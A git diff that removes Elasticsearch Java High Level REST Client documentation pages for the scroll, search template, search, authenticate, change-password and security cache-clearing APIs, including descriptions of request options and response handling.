the scroll is completed - -[[java-rest-high-clear-scroll]] -=== Clear Scroll API - -The search contexts used by the Search Scroll API are automatically deleted when the scroll -times out. 
But it is advised to release search contexts as soon as they are not -necessary anymore using the Clear Scroll API. - -[[java-rest-high-clear-scroll-request]] -==== Clear Scroll Request - -A `ClearScrollRequest` can be created as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[clear-scroll-request] --------------------------------------------------- -<1> Create a new `ClearScrollRequest` -<2> Adds a scroll id to the list of scroll identifiers to clear - -==== Providing the scroll identifiers -The `ClearScrollRequest` allows to clear one or more scroll identifiers in a single request. - -The scroll identifiers can be added to the request one by one: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[clear-scroll-add-scroll-id] --------------------------------------------------- - -Or all together using: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[clear-scroll-add-scroll-ids] --------------------------------------------------- - -[[java-rest-high-clear-scroll-sync]] -==== Synchronous Execution - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[clear-scroll-execute] --------------------------------------------------- - -[[java-rest-high-clear-scroll-async]] -==== Asynchronous Execution - -The asynchronous execution of a clear scroll request requires both the `ClearScrollRequest` -instance and an `ActionListener` instance to be passed to the asynchronous -method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[clear-scroll-execute-async] --------------------------------------------------- -<1> The `ClearScrollRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `ClearScrollResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[clear-scroll-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. 
The raised exception is provided as an argument - -[[java-rest-high-clear-scroll-response]] -==== Clear Scroll Response - -The returned `ClearScrollResponse` allows to retrieve information about the released - search contexts: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[clear-scroll-response] --------------------------------------------------- -<1> Return true if the request succeeded -<2> Return the number of released search contexts diff --git a/docs/java-rest/high-level/search/search-template.asciidoc b/docs/java-rest/high-level/search/search-template.asciidoc deleted file mode 100644 index 3f0dfb8ab28..00000000000 --- a/docs/java-rest/high-level/search/search-template.asciidoc +++ /dev/null @@ -1,117 +0,0 @@ -[[java-rest-high-search-template]] -=== Search Template API - -The search template API allows for searches to be executed from a template based -on the mustache language, and also for previewing rendered templates. - -[[java-rest-high-search-template-request]] -==== Search Template Request - -===== Inline Templates - -In the most basic form of request, the search template is specified inline: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[search-template-request-inline] --------------------------------------------------- -<1> The search is executed against the `posts` index. -<2> The template defines the structure of the search source. It is passed -as a string because mustache templates are not always valid JSON. -<3> Before running the search, the template is rendered with the provided parameters. - -===== Registered Templates - -Search templates can be registered in advance through stored scripts API. Note that -the stored scripts API is not yet available in the high-level REST client, so in this -example we use the low-level REST client. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[register-script] --------------------------------------------------- - -Instead of providing an inline script, we can refer to this registered template in the request: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[search-template-request-stored] --------------------------------------------------- - -===== Rendering Templates - -Given parameter values, a template can be rendered without executing a search: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[render-search-template-request] --------------------------------------------------- -<1> Setting `simulate` to `true` causes the search template to only be rendered. - -Both inline and pre-registered templates can be rendered. 
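For orientation, an inline template request can be assembled roughly as follows (a
sketch: `client` is an assumed `RestHighLevelClient`, the `posts` index and the
parameter values mirror the examples above and imports are omitted):

[source,java]
--------------------------------------------------
SearchTemplateRequest request = new SearchTemplateRequest();
request.setRequest(new SearchRequest("posts")); // the search is executed against "posts"

request.setScriptType(ScriptType.INLINE);
request.setScript(                              // the mustache template, passed as a string
    "{\"query\": { \"match\": { \"{{field}}\": \"{{value}}\" } }, \"size\": \"{{size}}\"}");

Map<String, Object> params = new HashMap<>();
params.put("field", "title");
params.put("value", "elasticsearch");
params.put("size", 5);
request.setScriptParams(params);                // parameters used to render the template

SearchTemplateResponse response = client.searchTemplate(request, RequestOptions.DEFAULT);
SearchResponse searchResponse = response.getResponse(); // the results of the executed search
--------------------------------------------------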
- -===== Optional Arguments - -As in standard search requests, the `explain` and `profile` options are supported: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[search-template-request-options] --------------------------------------------------- - -===== Additional References - -The {ref}/search-template.html[Search Template documentation] contains further examples of how search requests can be templated. - -[[java-rest-high-search-template-sync]] -==== Synchronous Execution - -The `searchTemplate` method executes the request synchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[search-template-execute] --------------------------------------------------- - -==== Asynchronous Execution - -A search template request can be executed asynchronously through the `searchTemplateAsync` -method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[search-template-execute-async] --------------------------------------------------- -<1> The `SearchTemplateRequest` to execute and the `ActionListener` to call when the execution completes. - -The asynchronous method does not block and returns immediately. Once the request completes, the -`ActionListener` is called back using the `onResponse` method if the execution completed successfully, -or using the `onFailure` method if it failed. - -A typical listener for `SearchTemplateResponse` is constructed as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[search-template-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. -<2> Called when the whole `SearchTemplateRequest` fails. - -==== Search Template Response - -For a standard search template request, the response contains a `SearchResponse` object -with the result of executing the search: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[search-template-response] --------------------------------------------------- - -If `simulate` was set to `true` in the request, then the response -will contain the rendered search source instead of a `SearchResponse`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[render-search-template-response] --------------------------------------------------- -<1> The rendered source in bytes, in our example `{"query": { "match" : { "title" : "elasticsearch" }}, "size" : 5}`. 
diff --git a/docs/java-rest/high-level/search/search.asciidoc b/docs/java-rest/high-level/search/search.asciidoc deleted file mode 100644 index ea439d7d419..00000000000 --- a/docs/java-rest/high-level/search/search.asciidoc +++ /dev/null @@ -1,464 +0,0 @@ --- -:api: search -:request: SearchRequest -:response: SearchResponse --- - -[id="{upid}-{api}"] -=== Search API - -[id="{upid}-{api}-request"] -==== Search Request - -The +{request}+ is used for any operation that has to do with searching -documents, aggregations, suggestions and also offers ways of requesting -highlighting on the resulting documents. - -In its most basic form, we can add a query to the request: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-basic] --------------------------------------------------- - -<1> Creates the `SearchRequest`. Without arguments this runs against all indices. -<2> Most search parameters are added to the `SearchSourceBuilder`. It offers setters for everything that goes into the search request body. -<3> Add a `match_all` query to the `SearchSourceBuilder`. -<4> Add the `SearchSourceBuilder` to the `SearchRequest`. - -[id="{upid}-{api}-request-optional"] -===== Optional arguments - -Let's first look at some of the optional arguments of a +{request}+: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indices] --------------------------------------------------- -<1> Restricts the request to an index - -There are a couple of other interesting optional parameters: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-routing] --------------------------------------------------- -<1> Set a routing parameter - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Setting `IndicesOptions` controls how unavailable indices are resolved and -how wildcard expressions are expanded - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-preference] --------------------------------------------------- -<1> Use the preference parameter e.g. to execute the search to prefer local -shards. The default is to randomize across shards. - -===== Using the SearchSourceBuilder - -Most options controlling the search behavior can be set on the -`SearchSourceBuilder`, -which contains more or less the equivalent of the options in the search request -body of the Rest API. - -Here are a few examples of some common options: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-source-basics] --------------------------------------------------- -<1> Create a `SearchSourceBuilder` with default options. -<2> Set the query. Can be any type of `QueryBuilder` -<3> Set the `from` option that determines the result index to start searching -from. Defaults to 0. -<4> Set the `size` option that determines the number of search hits to return. -Defaults to 10. -<5> Set an optional timeout that controls how long the search is allowed to -take. 
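For orientation, a condensed, hypothetical sketch combining the optional request arguments and the `SearchSourceBuilder` options described above. The index name, routing value and query are illustrative:

["source","java"]
--------------------------------------------------
// Optional request-level arguments (values are illustrative):
SearchRequest searchRequest = new SearchRequest("posts");
searchRequest.routing("user_1");                                   // route to a specific shard set
searchRequest.preference("_local");                                // prefer local shards over the randomized default
searchRequest.indicesOptions(IndicesOptions.lenientExpandOpen());  // control index resolution and wildcard expansion

// Common SearchSourceBuilder options:
SearchSourceBuilder sourceBuilder = new SearchSourceBuilder();
sourceBuilder.query(QueryBuilders.matchQuery("user", "kimchy"));   // any QueryBuilder can be used here
sourceBuilder.from(0);                                             // index of the first result, defaults to 0
sourceBuilder.size(10);                                            // number of hits to return, defaults to 10
sourceBuilder.timeout(new TimeValue(60, TimeUnit.SECONDS));        // optional search timeout
// the sourceBuilder is then added to the request, as shown in the next snippet
--------------------------------------------------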
- -After this, the `SearchSourceBuilder` only needs to be added to the -+{request}+: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-source-setter] --------------------------------------------------- - -[id="{upid}-{api}-request-building-queries"] -===== Building queries - -Search queries are created using `QueryBuilder` objects. A `QueryBuilder` exists - for every search query type supported by Elasticsearch's {ref}/query-dsl.html[Query DSL]. - -A `QueryBuilder` can be created using its constructor: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-query-builder-ctor] --------------------------------------------------- -<1> Create a full text {ref}/query-dsl-match-query.html[Match Query] that matches -the text "kimchy" over the field "user". - -Once created, the `QueryBuilder` object provides methods to configure the options -of the search query it creates: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-query-builder-options] --------------------------------------------------- -<1> Enable fuzzy matching on the match query -<2> Set the prefix length option on the match query -<3> Set the max expansion options to control the fuzzy - process of the query - -`QueryBuilder` objects can also be created using the `QueryBuilders` utility class. -This class provides helper methods that can be used to create `QueryBuilder` objects - using a fluent programming style: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-query-builders] --------------------------------------------------- - -Whatever the method used to create it, the `QueryBuilder` object must be added -to the `SearchSourceBuilder` as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-query-setter] --------------------------------------------------- - -The <<{upid}-query-builders, Building Queries>> page gives a list of all available search queries with -their corresponding `QueryBuilder` objects and `QueryBuilders` helper methods. - - -===== Specifying Sorting - -The `SearchSourceBuilder` allows to add one or more `SortBuilder` instances. There are four special implementations (Field-, Score-, GeoDistance- and ScriptSortBuilder). - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-source-sorting] --------------------------------------------------- -<1> Sort descending by `_score` (the default) -<2> Also sort ascending by `_id` field - -===== Source filtering - -By default, search requests return the contents of the document `_source` but like in the Rest API you can overwrite this behavior. 
For example, you can turn off `_source` retrieval completely: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-source-filtering-off] --------------------------------------------------- - -The method also accepts an array of one or more wildcard patterns to control which fields get included or excluded in a more fine grained way: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-source-filtering-includes] --------------------------------------------------- - -[id="{upid}-{api}-request-highlighting"] -===== Requesting Highlighting - -Highlighting search results can be achieved by setting a `HighlightBuilder` on the -`SearchSourceBuilder`. Different highlighting behaviour can be defined for each -fields by adding one or more `HighlightBuilder.Field` instances to a `HighlightBuilder`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-highlighting] --------------------------------------------------- -<1> Creates a new `HighlightBuilder` -<2> Create a field highlighter for the `title` field -<3> Set the field highlighter type -<4> Add the field highlighter to the highlight builder - -There are many options which are explained in detail in the Rest API documentation. The Rest -API parameters (e.g. `pre_tags`) are usually changed by -setters with a similar name (e.g. `#preTags(String ...)`). - -Highlighted text fragments can <<{upid}-{api}-response-highlighting,later be retrieved>> from the +{response}+. - -[id="{upid}-{api}-request-building-aggs"] -===== Requesting Aggregations - -Aggregations can be added to the search by first creating the appropriate -`AggregationBuilder` and then setting it on the `SearchSourceBuilder`. In the -following example we create a `terms` aggregation on company names with a -sub-aggregation on the average age of employees in the company: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-aggregations] --------------------------------------------------- - -The <<{upid}-aggregation-builders, Building Aggregations>> page gives a list of all available aggregations with -their corresponding `AggregationBuilder` objects and `AggregationBuilders` helper methods. - -We will later see how to <<{upid}-{api}-response-aggs,access aggregations>> in the +{response}+. - -===== Requesting Suggestions - -To add Suggestions to the search request, use one of the `SuggestionBuilder` implementations -that are easily accessible from the `SuggestBuilders` factory class. Suggestion builders -need to be added to the top level `SuggestBuilder`, which itself can be set on the `SearchSourceBuilder`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-suggestion] --------------------------------------------------- -<1> Creates a new `TermSuggestionBuilder` for the `user` field and -the text `kmichy` -<2> Adds the suggestion builder and names it `suggest_user` - -We will later see how to <<{upid}-{api}-response-suggestions,retrieve suggestions>> from the -+{response}+. 
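As a rough recap of the builders introduced in the previous sections, here is a hypothetical sketch that attaches highlighting, an aggregation and a suggestion to an existing `SearchSourceBuilder`; the field and aggregation names are illustrative:

["source","java"]
--------------------------------------------------
// Highlighting on the "title" field:
HighlightBuilder highlightBuilder = new HighlightBuilder();
HighlightBuilder.Field highlightTitle = new HighlightBuilder.Field("title");
highlightTitle.highlighterType("unified");
highlightBuilder.field(highlightTitle);
sourceBuilder.highlighter(highlightBuilder);

// A terms aggregation on company names with an average-age sub-aggregation:
TermsAggregationBuilder byCompany = AggregationBuilders.terms("by_company").field("company.keyword");
byCompany.subAggregation(AggregationBuilders.avg("average_age").field("age"));
sourceBuilder.aggregation(byCompany);

// A term suggestion named "suggest_user" on the "user" field:
TermSuggestionBuilder termSuggestion = SuggestBuilders.termSuggestion("user");
termSuggestion.text("kmichy");
SuggestBuilder suggestBuilder = new SuggestBuilder();
suggestBuilder.addSuggestion("suggest_user", termSuggestion);
sourceBuilder.suggest(suggestBuilder);
--------------------------------------------------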
- -===== Profiling Queries and Aggregations - -The {ref}/search-profile.html[Profile API] can be used to profile the execution of queries and aggregations for -a specific search request. In order to use it, the profile flag must be set to true on the `SearchSourceBuilder`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-profiling] --------------------------------------------------- - -Once the +{request}+ is executed the corresponding +{response}+ will -<<{upid}-{api}-response-profile,contain the profiling results>>. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== {response} - -The +{response}+ that is returned by executing the search provides details -about the search execution itself as well as access to the documents returned. -First, there is useful information about the request execution itself, like the -HTTP status code, execution time or whether the request terminated early or timed -out: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response-1] --------------------------------------------------- - -Second, the response also provides information about the execution on the -shard level by offering statistics about the total number of shards that were -affected by the search, and the successful vs. unsuccessful shards. Possible -failures can also be handled by iterating over an array of -`ShardSearchFailures` like in the following example: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response-2] --------------------------------------------------- - -[id="{upid}-{api}-response-search-hits"] -===== Retrieving SearchHits - -To get access to the returned documents, we need to first get the `SearchHits` -contained in the response: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-hits-get] --------------------------------------------------- - -The `SearchHits` provides global information about all hits, like total number -of hits or the maximum score: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-hits-info] --------------------------------------------------- - -Nested inside the `SearchHits` are the individual search results that can -be iterated over: - - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-hits-singleHit] --------------------------------------------------- - -The `SearchHit` provides access to basic information like index, document ID -and score of each search hit: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-hits-singleHit-properties] --------------------------------------------------- - -Furthermore, it lets you get back the document source, either as a simple -JSON string or as a map of key/value pairs. In this map, regular fields -are keyed by the field name and contain the field value. Multi-valued fields are -returned as lists of objects, nested objects as another key/value map.
These -cases need to be cast accordingly: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-hits-singleHit-source] --------------------------------------------------- - -[id="{upid}-{api}-response-highlighting"] -===== Retrieving Highlighting - -If <<{upid}-{api}-request-highlighting,requested>>, highlighted text fragments can be retrieved from each `SearchHit` in the result. The hit object offers -access to a map of field names to `HighlightField` instances, each of which contains one -or many highlighted text fragments: - - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-highlighting-get] --------------------------------------------------- -<1> Get the highlighting for the `title` field -<2> Get one or many fragments containing the highlighted field content - -[id="{upid}-{api}-response-aggs"] -===== Retrieving Aggregations - -Aggregations can be retrieved from the +{response}+ by first getting the -root of the aggregation tree, the `Aggregations` object, and then getting the -aggregation by name. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-aggregations-get] --------------------------------------------------- -<1> Get the `by_company` terms aggregation -<2> Get the buckets that is keyed with `Elastic` -<3> Get the `average_age` sub-aggregation from that bucket - -Note that if you access aggregations by name, you need to specify the -aggregation interface according to the type of aggregation you requested, -otherwise a `ClassCastException` will be thrown: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[search-request-aggregations-get-wrongCast] --------------------------------------------------- -<1> This will throw an exception because "by_company" is a `terms` aggregation -but we try to retrieve it as a `range` aggregation - -It is also possible to access all aggregations as a map that is keyed by the -aggregation name. In this case, the cast to the proper aggregation interface -needs to happen explicitly: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-aggregations-asMap] --------------------------------------------------- - -There are also getters that return all top level aggregations as a list: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-aggregations-asList] --------------------------------------------------- - -And last but not least you can iterate over all aggregations and then e.g. 
-decide how to further process them based on their type: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-aggregations-iterator] --------------------------------------------------- - -[id="{upid}-{api}-response-suggestions"] -===== Retrieving Suggestions - -To get back the suggestions from a +{response}+, use the `Suggest` object as an entry point and then retrieve the nested suggestion objects: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-suggestion-get] --------------------------------------------------- -<1> Use the `Suggest` class to access suggestions -<2> Suggestions can be retrieved by name. You need to assign them to the correct -type of Suggestion class (here `TermSuggestion`), otherwise a `ClassCastException` is thrown -<3> Iterate over the suggestion entries -<4> Iterate over the options in one entry - -[id="{upid}-{api}-response-profile"] -===== Retrieving Profiling Results - -Profiling results are retrieved from a +{response}+ using the `getProfileResults()` method. This - method returns a `Map` containing a `ProfileShardResult` object for every shard involved in the - +{request}+ execution. `ProfileShardResult` are stored in the `Map` using a key that uniquely - identifies the shard the profile result corresponds to. - -Here is a sample code that shows how to iterate over all the profiling results of every shard: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-profiling-get] --------------------------------------------------- -<1> Retrieve the `Map` of `ProfileShardResult` from the +{response}+ -<2> Profiling results can be retrieved by shard's key if the key is known, otherwise it might be simpler - to iterate over all the profiling results -<3> Retrieve the key that identifies which shard the `ProfileShardResult` belongs to -<4> Retrieve the `ProfileShardResult` for the given shard - -The `ProfileShardResult` object itself contains one or more query profile results, one for each query -executed against the underlying Lucene index: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-profiling-queries] --------------------------------------------------- -<1> Retrieve the list of `QueryProfileShardResult` -<2> Iterate over each `QueryProfileShardResult` - -Each `QueryProfileShardResult` gives access to the detailed query tree execution, returned as a list of -`ProfileResult` objects: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-profiling-queries-results] --------------------------------------------------- -<1> Iterate over the profile results -<2> Retrieve the name of the Lucene query -<3> Retrieve the time in millis spent executing the Lucene query -<4> Retrieve the profile results for the sub-queries (if any) - -The Rest API documentation contains more information about {ref}/search-profile.html#profiling-queries[Profiling Queries] with -a description of the query profiling information. 
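For orientation only, a hedged sketch of the iteration described above; `searchResponse` is the response of a request that had profiling enabled, the getter names follow the callouts, but exact signatures may differ between client versions:

["source","java"]
--------------------------------------------------
// Walk the profiling tree, shard by shard:
Map<String, ProfileShardResult> profileResults = searchResponse.getProfileResults();
for (Map.Entry<String, ProfileShardResult> entry : profileResults.entrySet()) {
    String shardKey = entry.getKey();                  // uniquely identifies the shard
    ProfileShardResult shardResult = entry.getValue();
    for (QueryProfileShardResult queryProfile : shardResult.getQueryProfileResults()) {
        for (ProfileResult result : queryProfile.getQueryResults()) {
            String queryName = result.getQueryName();                      // name of the Lucene query
            long time = result.getTime();                                  // time reported for this query
            List<ProfileResult> children = result.getProfiledChildren();   // sub-queries, if any
        }
    }
}
--------------------------------------------------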
- -The `QueryProfileShardResult` also gives access to the profiling information for the Lucene collectors: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-profiling-queries-collectors] --------------------------------------------------- -<1> Retrieve the profiling result of the Lucene collector -<2> Retrieve the name of the Lucene collector -<3> Retrieve the time in millis spent executing the Lucene collector -<4> Retrieve the profile results for the sub-collectors (if any) - -The Rest API documentation contains more details about the profiling information -for Lucene collectors. See {ref}/search-profile.html#profiling-queries[Profiling queries]. - -In a very similar manner to the query tree execution, the `QueryProfileShardResult` object gives access -to the detailed aggregations tree execution: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-profiling-aggs] --------------------------------------------------- -<1> Retrieve the `AggregationProfileShardResult` -<2> Iterate over the aggregation profile results -<3> Retrieve the type of the aggregation (corresponds to the Java class used to execute the aggregation) -<4> Retrieve the time in millis spent executing the aggregation -<5> Retrieve the profile results for the sub-aggregations (if any) - -The Rest API documentation contains more information about -{ref}/search-profile.html#profiling-aggregations[Profiling aggregations]. diff --git a/docs/java-rest/high-level/security/authenticate.asciidoc b/docs/java-rest/high-level/security/authenticate.asciidoc deleted file mode 100644 index 0a2feb31cf9..00000000000 --- a/docs/java-rest/high-level/security/authenticate.asciidoc +++ /dev/null @@ -1,75 +0,0 @@ - --- -:api: authenticate -:response: AuthenticateResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Authenticate API - -[id="{upid}-{api}-sync"] -==== Execution - -Authenticating and retrieving information about a user can be performed -using the `security().authenticate()` method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-execute] --------------------------------------------------- - -This method does not require a request object. The client waits for the -+{response}+ to be returned before continuing with code execution. - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ describes the authenticated user. The `user` field, -accessed with `getUser`, contains all the information about this -authenticated user. The field `enabled` tells if this user is actually -usable or has been temporarily deactivated. The field `authentication_realm`, -accessed with `getAuthenticationRealm`, contains the name and type of the -Realm that has authenticated the user, and the field `lookup_realm`, -accessed with `getLookupRealm`, contains the name and type of the Realm from which -the user information was retrieved. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> `getUser` retrieves the `User` instance containing the information, -see {javadoc-client}/security/user/User.html. -<2> `enabled` tells if this user is usable or is deactivated.
-<3> `getAuthenticationRealm().getName()` retrieves the name of the realm that authenticated the user. -<4> `getAuthenticationRealm().getType()` retrieves the type of the realm that authenticated the user. -<5> `getLookupRealm().getName()` retrieves the name of the realm from where the user information is looked up. -<6> `getLookupRealm().getType()` retrieves the type of the realm from where the user information is looked up. -<7> `getAuthenticationType()` retrieves the authentication type of the authenticated user. - -[id="{upid}-{api}-async"] -==== Asynchronous Execution - -This request can also be executed asynchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-execute-async] --------------------------------------------------- -<1> The `ActionListener` to use when the execution completes. This method does -not require a request object. - -The asynchronous method does not block and returns immediately. Once the request -has completed the `ActionListener` is called back using the `onResponse` method -if the execution completed successfully or using the `onFailure` method if -it failed. - -A typical listener for a +{response}+ looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-execute-listener] --------------------------------------------------- -<1> Called when the execution completed successfully. The response is -provided as an argument. -<2> Called in case of a failure. The exception is provided as an argument. - diff --git a/docs/java-rest/high-level/security/change-password.asciidoc b/docs/java-rest/high-level/security/change-password.asciidoc deleted file mode 100644 index 6593e810598..00000000000 --- a/docs/java-rest/high-level/security/change-password.asciidoc +++ /dev/null @@ -1,46 +0,0 @@ -[role="xpack"] -[[java-rest-high-security-change-password]] -=== Change Password API - -[[java-rest-high-security-change-password-execution]] -==== Execution - -A user's password can be changed using the `security().changePassword()` -method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[change-password-execute] --------------------------------------------------- - -[[java-rest-high-change-password-response]] -==== Response - -The returned `Boolean` indicates the request status. - -[[java-rest-high-x-pack-security-change-password-async]] -==== Asynchronous Execution - -This request can be executed asynchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[change-password-execute-async] --------------------------------------------------- -<1> The `ChangePassword` request to execute and the `ActionListener` to use when -the execution completes. - -The asynchronous method does not block and returns immediately. Once the request -has completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. 
- -A typical listener for a `Boolean` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[change-password-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument. -<2> Called in case of failure. The raised exception is provided as an argument. diff --git a/docs/java-rest/high-level/security/clear-api-key-cache.asciidoc b/docs/java-rest/high-level/security/clear-api-key-cache.asciidoc deleted file mode 100644 index 2d680145496..00000000000 --- a/docs/java-rest/high-level/security/clear-api-key-cache.asciidoc +++ /dev/null @@ -1,34 +0,0 @@ - --- -:api: clear-api-key-cache -:request: ClearApiKeyCacheRequest -:response: ClearSecurityCacheResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Clear API Key Cache API - -[id="{upid}-{api}-request"] -==== Clear API Key Cache Request - -A +{request}+ supports clearing API key cache for the given IDs. -It can also clear the entire cache if no ID is specified. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> the IDs(s) for the API keys to be evicted from the cache - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Clear API Key Cache Response - -The returned +{response}+ allows to retrieve information about where the cache was cleared. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> the list of nodes that the cache was cleared on diff --git a/docs/java-rest/high-level/security/clear-privileges-cache.asciidoc b/docs/java-rest/high-level/security/clear-privileges-cache.asciidoc deleted file mode 100644 index 2376c6a5bd8..00000000000 --- a/docs/java-rest/high-level/security/clear-privileges-cache.asciidoc +++ /dev/null @@ -1,33 +0,0 @@ - --- -:api: clear-privileges-cache -:request: ClearPrivilegesCacheRequest -:response: ClearPrivilegesCacheResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Clear Privileges Cache API - -[id="{upid}-{api}-request"] -==== Clear Privileges Cache Request - -A +{request}+ supports defining the name of applications that the cache should be cleared for. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- 